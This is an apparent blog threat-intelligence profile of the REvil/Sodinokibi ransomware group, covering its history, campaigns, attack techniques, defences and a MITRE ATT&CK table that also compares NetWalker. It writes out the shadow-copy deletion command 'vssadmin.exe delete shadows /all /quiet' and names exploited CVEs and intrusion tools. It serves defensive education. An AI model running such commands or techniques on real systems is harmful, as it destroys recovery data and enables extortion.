Table of Contents
REvil, also known by its ransomware name Sodinokibi, emerged as one of the most notorious and prolific cybercriminal operations in recent history. Operating primarily under a Ransomware-as-a-Service (RaaS) model, REvil provided its potent ransomware code and infrastructure to affiliates, who then carried out devastating attacks across the globe. Known for its brazen tactics, high ransom demands, and targeting of large enterprises and critical infrastructure, REvil exemplified the escalating threat of financially motivated cybercrime. The group pioneered and popularized the "double extortion" tactic – encrypting victim data while simultaneously exfiltrating sensitive information and threatening to leak it publicly on their dedicated "Happy Blog" leak site if ransom demands were not met. Although officially dismantled by international law enforcement efforts in late 2021 and early 2022, REvil's impact, techniques, and the RaaS model it championed continue to influence the threat landscape, making an understanding of its operations crucial for security professionals.
Origins & Evolution
REvil is widely believed to have emerged in April 2019, shortly after the high-profile shutdown of another major RaaS operation, GandCrab. Significant code similarities between GandCrab and Sodinokibi, along with the timing of REvil's appearance, strongly suggest that REvil was either a direct successor, a rebrand, or operated by core members of the former GandCrab team. The name "REvil" itself is thought to be a contraction of "Ransomware Evil," potentially inspired by the Resident Evil video game series, while "Sodinokibi" was derived from an internal name within the malware code.
The group is strongly suspected to have originated from Russia or Russian-speaking regions. This assessment is based on several factors: the malware code included checks to avoid encrypting systems using Russian or other Commonwealth of Independent States (CIS) keyboard layouts or language settings; the group predominantly targeted organizations outside the CIS; and ultimately, Russia's Federal Security Service (FSB) claimed responsibility for dismantling the group's core infrastructure and arresting members in January 2022, following intelligence sharing prompted by pressure from the United States.
REvil rapidly evolved from its inception, quickly gaining notoriety for its effectiveness and the scale of its attacks. The RaaS model allowed it to scale operations significantly, attracting numerous skilled affiliates. Over time, REvil operators refined their malware, improved evasion techniques, and increased their ransom demands substantially, often demanding millions of dollars. The group's infrastructure, including the "Happy Blog," became a central part of their extortion strategy. Despite a temporary disappearance in mid-2021 following the Kaseya attack and subsequent international pressure, the group's infrastructure briefly reappeared before being definitively seized and dismantled by law enforcement efforts known as "Operation GoldDust." Internal conflicts also reportedly plagued the group, including accusations of the core developers cheating affiliates out of ransom payments via a backdoor, which may have contributed to its eventual downfall. An intrusion set tracked as "Water Mare" has been linked to the operators behind REvil, with key figures like "UNKN" (or "Unknown") acting as public faces or recruiters on underground forums before disappearing.
Tactics & Techniques
REvil operated a sophisticated RaaS model, leveraging a network of skilled affiliates to execute attacks while the core team maintained the ransomware code, C2 infrastructure, and the payment/leak portal. Their modus operandi involved multiple stages, showcasing a range of advanced TTPs.
Initial Access: Affiliates employed various methods to breach victim networks. Common vectors included:
Exploiting Vulnerabilities: Targeting known vulnerabilities in public-facing applications, such as VPN gateways (Pulse Secure CVE-2019-11510, Fortinet CVE-2018-13379, Citrix CVE-2019-19781) and remote management software (Kaseya VSA CVE-2021-30116).
Phishing Campaigns: Using spear-phishing emails with malicious attachments (often JavaScript or Office documents with macros) or links leading to exploit kits or credential harvesting pages. Learn more about types of phishing attacks.
Compromised RDP: Brute-forcing or using stolen Remote Desktop Protocol credentials to gain direct access to servers.
Malware Distribution Networks: Leveraging other malware infections like Qakbot or TrickBot as an entry point.
Execution and Persistence: Once initial access was gained, REvil affiliates executed payloads, often using PowerShell or scripting interpreters. Persistence was established through methods like creating scheduled tasks or modifying registry run keys. Later variants introduced the ability to reboot into Safe Mode to bypass security controls during encryption.
Defense Evasion: REvil employed numerous techniques to avoid detection:
Process Injection: Injecting malicious code into legitimate processes (e.g., specifically targeting Ahnlab's
autoup.exeor PowerShell).Disabling Security Tools: Terminating processes associated with antivirus, EDR solutions, and backup software. Windows Defender was often specifically targeted.
Deleting Shadow Copies: Using
vssadmin.exe delete shadows /all /quietto prevent easy file recovery.Code Obfuscation: Utilizing multiple layers of obfuscation, particularly in initial droppers (e.g., JavaScript obfuscation, Base64 encoding).
Language/Region Checks: Avoiding execution on systems configured for Russian or CIS languages.
UAC Bypass: Employing techniques to escalate privileges without triggering User Account Control prompts.
Discovery and Lateral Movement: Affiliates performed reconnaissance within the network using tools like AdFind, BloodHound, and NBTScan to map the environment, identify high-value targets, and locate domain controllers. Lateral movement was typically achieved using valid credentials (obtained via tools like Mimikatz, often deployed via frameworks like Cobalt Strike or SharpSploit) in conjunction with protocols like RDP and tools like PsExec.
Credential Access: Dumping credentials from memory using Mimikatz was a common tactic to facilitate lateral movement and privilege escalation.
Exfiltration: Before deploying the ransomware, REvil affiliates exfiltrated large volumes of sensitive data using tools like MegaSync, Rclone, or FileZilla. This data formed the basis of their double extortion threat.
Command and Control (C2): Communication with C2 servers often occurred over Tor or via HTTPS, using generated domain lists. Encrypted configuration files dictated C2 details, affiliate IDs (
pid), campaign IDs (sub), exclusion lists, and other operational parameters.Impact: The final stage involved encrypting files across the compromised network using strong encryption algorithms (like Salsa20 and elliptic-curve cryptography). A ransom note, typically named
[extension]-readme.txt, was dropped in each directory, directing victims to a Tor-based payment portal. The desktop wallpaper was often changed to display a ransom message. Failure to pay resulted in the publication of stolen data on the "Happy Blog." DDoS attacks were sometimes used as an additional pressure tactic. Learn how to protect your online business.
Tools Commonly Associated with REvil Operations: Cobalt Strike, Mimikatz, PsExec, AdFind, BloodHound, SharpSploit, Process Hacker, PC Hunter, Rclone, MegaSync, FileZilla, PowerShell Empire, Qakbot (as delivery).
Targets or Victimology
REvil's primary motivation was financial gain, achieved through large ransom payments and, occasionally, the sale of stolen data. While not explicitly linked to state-sponsored espionage, the group's targeting sometimes overlapped with geopolitical interests, particularly concerning critical infrastructure, though profit remained the driving force.
The potential impact of a REvil attack was severe, including:
Data Breach: Exfiltration of sensitive corporate, customer, or employee data.
Operational Disruption: Encryption of critical systems leading to complete shutdowns of business operations, manufacturing lines, or essential services.
Financial Loss: Costs associated with ransom payments, incident response, recovery efforts, legal fees, and regulatory fines.
Reputational Damage: Loss of customer trust and public confidence following data leaks or service outages.
Supply Chain Effects: Attacks on managed service providers (MSPs) like Kaseya demonstrated the potential for cascading impacts across hundreds or thousands of downstream organizations.
Targeted Industries: REvil was largely indiscriminate but often focused on organizations perceived as having the capacity and incentive to pay large ransoms. Key sectors included:
Information Technology (especially MSPs)
Manufacturing & Food Production (e.g., JBS, Acer, Quanta)
Legal Services
Healthcare
Financial Services
Transportation & Logistics
Retail
Local Government and Educational Institutions
Targeted Regions: REvil operated globally but had a significant focus on North America (particularly the United States) and Europe. As noted, they actively avoided targeting organizations within Russia and the CIS. Learn more about cybersecurity in the age of IoT.
Attack Campaigns
REvil was responsible for numerous high-impact ransomware campaigns during its operational period. Some of the most notable include:
Grubman Shire Meiselas & Sacks (May 2020): A high-profile attack against a major entertainment law firm representing numerous celebrities. REvil claimed to have stolen 756GB of data and initially demanded $21 million, later doubling it to $42 million and threatening to release data related to prominent clients, including an unsuccessful extortion attempt against then-President Trump.
Acer (March 2021): The Taiwanese computer manufacturer was hit with a $50 million ransom demand, one of the largest recorded at the time. REvil affiliates claimed to have exploited Microsoft Exchange vulnerabilities to gain access.
Quanta Computer (April 2021): An attack on a major Taiwanese electronics manufacturer and key Apple supplier. REvil stole confidential schematics, including designs for upcoming Apple products, and demanded $50 million.
JBS S.A. (May 2021): A devastating attack on the world's largest meat processing company, forcing the temporary shutdown of facilities in the US, Canada, and Australia, impacting food supply chains. JBS ultimately paid an $11 million ransom in Bitcoin. The White House publicly attributed the attack to REvil.
Kaseya VSA (July 2021): Perhaps REvil's most infamous attack. The group exploited a zero-day vulnerability (CVE-2021-30116) in Kaseya's VSA remote management software, used by MSPs. This supply chain attack allowed REvil to distribute ransomware to potentially thousands of downstream clients globally, causing widespread disruption (e.g., forcing the closure of Coop supermarkets in Sweden). REvil initially demanded $70 million for a universal decryptor. This attack significantly escalated international law enforcement focus on the group.
Defenses
Defending against threats like REvil requires a multi-layered security strategy focusing on prevention, detection, and response. Given REvil's TTPs, the following defenses are particularly relevant:
Patch Management: Aggressively patch vulnerabilities, especially those in public-facing systems like VPNs, RDP, and management software. Prioritize patches for CVEs known to be exploited by REvil and similar groups. Learn more about patch management strategy.
Secure Remote Access: Harden RDP configurations (disable if unused, use strong passwords, MFA, Network Level Authentication), implement MFA for VPN access, and monitor remote access logs closely.
Email Security: Deploy advanced email filtering solutions to block phishing attempts, malicious attachments, and dangerous links. Conduct regular security awareness training for employees on identifying phishing tactics.
Endpoint Security: Utilize robust Endpoint Detection and Response (EDR) solutions capable of detecting and blocking REvil's TTPs, such as credential dumping (Mimikatz), process injection, lateral movement tools (PsExec), and ransomware behaviors. Keep signatures and behavioral models up-to-date.
Network Segmentation: Segment networks to limit the blast radius of an infection. Prevent lateral movement by restricting communication between segments based on the principle of least privilege.
Least Privilege: Enforce the principle of least privilege for user accounts and service accounts. Limit administrative privileges strictly to those who require them.
PowerShell Security: Enable enhanced PowerShell logging and consider constraining PowerShell usage where possible using policies like Constrained Language Mode.
Backup and Recovery: Implement a robust backup strategy following the 3-2-1 rule (3 copies, 2 different media, 1 offsite/offline/immutable). Regularly test backup restoration procedures. Ensure backups are protected from ransomware encryption (e.g., offline or immutable storage).
Vulnerability Management: Conduct regular vulnerability scanning and penetration testing to identify and remediate weaknesses before they can be exploited.
Threat Intelligence: Stay informed about active ransomware threats, TTPs, and IOCs through threat intelligence feeds and security reports. You can improve threat detection using SOAR.
Incident Response Plan: Develop and regularly test a comprehensive incident response plan specifically addressing ransomware scenarios, including steps for containment, eradication, recovery, and communication.
REvil / Sodinokibi TTPs (MITRE ATT&CK)
|
Tactic
|
Technique ID
|
Technique Name
|
NetWalker
|
Sodinokibi/REvil
|
|---|---|---|---|---|
|
Reconnaissance
|
T1592
|
Gather Victim Host Information
|
Affiliates gather info about target systems before deploying
|
Discovery phase after initial access
|
|
Resource Development
|
T1587.001
|
Develop Capabilities: Malware
|
CIRCUS SPIDER developed and maintained the Netwalker payload
|
Core group developed Sodinokibi ransomware
|
|
Initial Access
|
T1566
|
Phishing
|
Used email lures (e.g., COVID-19) with malicious attachments or links
|
Common vector via malicious emails/links
|
|
T1190
|
Exploit Public-Facing Application
|
Exploited vulnerabilities in VPNs (Pulse Secure), Web Apps (Telerik UI), Citrix Gateway
|
Exploiting vulnerabilities like CVE-2019-19781, CVE-2019-11510, CVE-2018-13379, CVE-2021-30116
|
|
|
T1078
|
Valid Accounts
|
Exploited weak or compromised credentials, especially for RDP
|
Using stolen or brute-forced RDP/VPN credentials
|
|
|
T1189
|
Drive-by Compromise
|
Not documented
|
Via exploit kits or compromised websites
|
|
|
Execution
|
T1059.001
|
Command and Scripting Interpreter: PowerShell
|
Frequently used PowerShell for downloading payloads and fileless execution
|
Heavily used for execution, downloading payloads, defense evasion
|
|
T1204.002
|
User Execution: Malicious File
|
Relied on users opening malicious email attachments (e.g., VBScripts)
|
User interaction needed for phishing attachments
|
|
|
T1059.007
|
Command and Scripting Interpreter: JavaScript
|
Not documented
|
Used in initial droppers via phishing
|
|
|
Persistence
|
T1547.001
|
Boot or Logon Autostart Execution: Registry Run Keys
|
Some variants added registry keys for persistence
|
Common persistence mechanism
|
|
T1053.005
|
Scheduled Task/Job: Scheduled Task
|
Potential use of scheduled tasks for persistence or execution
|
Used for maintaining persistence
|
|
|
Privilege Escalation
|
T1078
|
Valid Accounts
|
Used compromised privileged accounts for broader access
|
See Initial Access
|
|
T1068
|
Exploitation for Privilege Escalation
|
Not documented
|
Used vulnerabilities like CVE-2018-8453
|
|
|
T1548.002
|
Abuse Elevation Control Mechanism: Bypass UAC
|
Not documented
|
Attempted UAC bypass if needed
|
|
|
Defense Evasion
|
T1490
|
Inhibit System Recovery
|
Deleted Volume Shadow Copies using
vssadmin |
Deleting Shadow Copies using
vssadmin |
|
T1055/T1055.012
|
Process Injection/Process Hollowing
|
Injected code into legitimate processes like
explorer.exe |
Injecting payload into legitimate processes (e.g., Ahnlab)
|
|
|
T1027
|
Obfuscated Files or Information
|
Embedded configuration was often RC4 encrypted. Used dynamic API resolution
|
Not explicitly documented
|
|
|
T1562.001
|
Impair Defenses: Disable or Modify Tools
|
Attempted to terminate security software processes
|
Terminating AV/EDR processes
|
|
|
T1070.004
|
Indicator Removal on Host: File Deletion
|
Not documented
|
Deleting original files after encryption
|
|
|
T1480.001
|
Execution Guardrails: Environmental Keying
|
Not documented
|
Language/region checks to avoid CIS countries
|
|
|
T1497.001
|
Virtualization/Sandbox Evasion: System Checks
|
Not documented
|
Basic checks for analysis environments
|
|
|
T1562.009
|
Impair Defenses: Safe Mode Boot
|
Not documented
|
Later variants used safe mode to bypass defenses during encryption
|
|
|
Credential Access
|
T1003.001
|
OS Credential Dumping: LSASS Memory
|
Not documented
|
Using Mimikatz to extract credentials
|
|
Discovery
|
T1083
|
File and Directory Discovery
|
Scanned local drives and network shares for files to encrypt
|
Identifying files/folders to encrypt/exclude
|
|
T1135
|
Network Share Discovery
|
Specifically looked for accessible network shares, including Admin$
|
Finding accessible network shares using tools like AdFind/BloodHound
|
|
|
T1082
|
System Information Discovery
|
Gathered basic system info to tailor attack or ransom note
|
Gathering basic system info for C2
|
|
|
T1057
|
Process Discovery
|
Not documented
|
Identifying security processes to terminate
|
|
|
T1016
|
System Network Configuration Discovery
|
Not documented
|
Understanding network settings
|
|
|
T1049
|
System Network Connections Discovery
|
Not documented
|
Identifying network shares/connections
|
|
|
Lateral Movement
|
T1021.001
|
Remote Services: Remote Desktop Protocol
|
Used RDP for moving within the network if credentials were obtained
|
Moving laterally using compromised credentials via RDP
|
|
T1021.002
|
Remote Services: SMB/Windows Admin Shares
|
Moved laterally and encrypted files via network shares
|
Using tools like PsExec with valid credentials
|
|
|
Collection
|
T1119
|
Automated Collection
|
Ransomware automatically collected files for encryption
|
Ransomware automatically scans and identifies files for encryption
|
|
T1560
|
Archive Collected Data
|
Data likely staged and archived before exfiltration
|
Potentially archiving data before exfiltration
|
|
|
Command & Control
|
T1071.001
|
Application Layer Protocol: Web Protocols
|
Used Tor-based web portals for ransom negotiation and data leak site
|
HTTPS for C2 communication
|
|
T1105
|
Ingress Tool Transfer
|
PowerShell used to download ransomware payload. Cobalt Strike beacons used by affiliates
|
Not explicitly documented
|
|
|
T1573.002
|
Encrypted Channel: Asymmetric Cryptography
|
Not documented
|
Encrypting C2 communication/configuration data (e.g., RC4, ECC)
|
|
|
T1132.001
|
Data Encoding: Standard Encoding
|
Not documented
|
Base64 encoding used in scripts
|
|
|
T1571
|
Non-Standard Port
|
Not documented
|
Possibly used non-standard ports
|
|
|
T1090.003
|
Proxy: Multi-hop Proxy
|
Not documented
|
Use of Tor for C2 and payment portal
|
|
|
Exfiltration
|
T1041
|
Exfiltration Over C2 Channel
|
Likely exfiltrated data over standard protocols (HTTPS) or custom channels before encryption
|
Smaller amounts of system data sent over C2
|
|
T1567.002
|
Exfiltration Over Web Service: Exfiltration to Cloud
|
Stolen data uploaded to attacker-controlled storage before being posted on leak site
|
Not explicitly documented
|
|
|
T1048
|
Exfiltration Over Alternative Protocol
|
Not documented
|
Using tools like MegaSync, Rclone, FileZilla for bulk data theft
|
|
|
Impact
|
T1486
|
Data Encrypted for Impact
|
Core function: encrypted files using Salsa20 and demanded ransom
|
Core ransomware function using Salsa20/AES + ECC/RSA
|
|
T1490
|
Inhibit System Recovery
|
Deleting backups/shadow copies increased impact and pressure to pay
|
Deleting Shadow Copies using
vssadmin |
|
|
T1485
|
Data Destruction
|
Deleting shadow copies constitutes a form of data destruction
|
See Inhibit System Recovery
|
|
|
T1489
|
Service Stop
|
Not documented
|
Stopping services (e.g., database, backup) to ensure file access
|
|
|
T1561.002
|
Disk Wipe: Disk Structure Wipe
|
Not documented
|
Some variants might modify boot sectors or MBR
|
|
|
T1491.001
|
Defacement: Internal Defacement
|
Not documented
|
Changing desktop wallpaper to ransom message
|
Conclusion
REvil (Sodinokibi) represented a significant escalation in the ransomware threat landscape between 2019 and 2021. Operating as a highly successful RaaS platform, it empowered numerous affiliates to conduct devastating attacks globally, pioneering double extortion tactics and targeting critical infrastructure for massive financial gain. Likely originating from Russia and evolving from the remnants of GandCrab, REvil's campaigns against entities like JBS and Kaseya caused widespread disruption and prompted concerted international law enforcement action, leading to its eventual takedown. While the core REvil operation has been dismantled, its legacy persists through the widespread adoption of the RaaS model and double extortion tactics by other cybercriminal groups. Understanding REvil's origins, TTPs, and impact remains vital for security professionals seeking to defend against the ever-evolving ransomware threat. Learn more about what is the MITRE ATT&CK framework.
Found this article interesting? Keep visit thesecmaster.com, and our social media page on Facebook, LinkedIn, Twitter, Telegram, Tumblr, Medium, and Instagram and subscribe to receive tips like this.
You may also like these articles:
• Ransomware Payments Drop 35% in 2024 as Law Enforcement Disrupts Cybercrime
• The Impact of AI on Cybersecurity Jobs- Is AI a Threat for Security Professionals?
• Evil Corp (Indrik Spider) hacktivist group
• Hunters International Ransomware-as-a-Service (RaaS) Group
Arun KL
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.
- April 1, 2025
- April 1, 2025
Learn Something New with Free Email subscription
Learn Something New with Free Email subscription
Subscribe
Subscribe
Subscribe
Subscribe
- April 1, 2025
- April 1, 2025
